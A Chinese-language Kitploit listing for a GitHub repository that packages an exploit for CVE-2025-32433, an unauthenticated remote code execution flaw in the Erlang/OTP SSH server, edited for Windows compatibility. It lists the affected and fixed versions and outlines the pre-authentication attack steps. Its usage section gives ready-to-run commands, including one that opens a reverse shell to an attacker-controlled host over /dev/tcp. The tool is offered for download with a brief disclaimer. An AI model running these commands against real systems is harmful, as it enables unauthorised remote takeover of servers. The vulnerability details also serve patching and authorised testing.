Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32433-Exploit-edited — 基于原始版本:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py 将 Unicode 对勾符号替换为 ASCII 字符以兼容 Windows | Kitploit
工具/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
漏洞分析漏洞利用渗透测试学习与教育红队远程访问工具
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

基于原始版本:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py 将 Unicode 对勾符号替换为 ASCII 字符以兼容 Windows

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
83个月前尚未审核
分享

CVE-2025-32433 漏洞利用(Windows兼容)

Erlang/OTP SSH 未经认证的远程代码执行

描述

本仓库包含针对 CVE-2025-32433 的漏洞利用代码,这是 Erlang/OTP SSH 服务器中的一个严重未经认证的远程代码执行漏洞。

主要特性:

  • ✅ 预认证 RCE 漏洞利用
  • ✅ 修复了 Windows GBK 编码兼容性问题
  • ✅ 适用于 Erlang/OTP 版本 ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

漏洞详情

CVE ID: CVE-2025-32433
严重性: 严重
影响: 未经认证的远程代码执行

此漏洞允许攻击者通过发送特制的 SSH 协议消息,在无需认证的情况下在 Erlang/OTP SSH 服务器上执行任意系统命令。

受影响版本

OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 及更早版本(可能)

使用方法

# 基本命令执行
python exploit.py -t <目标IP> -p 2222 -c "whoami"

# 执行系统命令
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# 原始 Erlang 代码执行
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# 反弹 Shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

参数

-t, --target    目标IP地址(默认:127.0.0.1)
-p, --port      目标端口(默认:2222)
-c, --command   要执行的系统命令
-e, --erlang    要执行的原始Erlang代码

Windows 编码修复

此版本修复了原始漏洞利用中的编码问题:

问题: 原始漏洞利用使用了 Unicode 对勾符号(✓,U+2713),导致在 Windows 上出现 GBK 编码错误:

'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

解决方案: 将 Unicode 字符替换为标准的 ASCII + 字符,以实现跨平台兼容。

技术细节

该漏洞利用通过以下步骤工作:

  1. 建立 SSH 连接并完成 Banner 交换
  2. 发送 SSH_MSG_KEXINIT 数据包
  3. 通过 SSH_MSG_CHANNEL_OPEN 打开 SSH 通道
  4. 在认证之前发送带有恶意 exec 命令的 SSH_MSG_CHANNEL_REQUEST
  5. 通过 os:cmd() 执行任意 Erlang 代码

参考资料

  • GitHub 安全公告
  • Erlang/OTP 提交修复
  • RFC 4254 - SSH 连接协议
  • ProDefense CVE-2025-32433

已修复版本

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

免责声明

此漏洞利用仅用于教育和授权的安全测试目的。未经授权访问计算机系统是违法的。请负责任地使用,仅在您拥有明确测试许可的系统上使用。

许可证

MIT 许可证

作者

由 chuzouX 修改以兼容 Windows

下载工具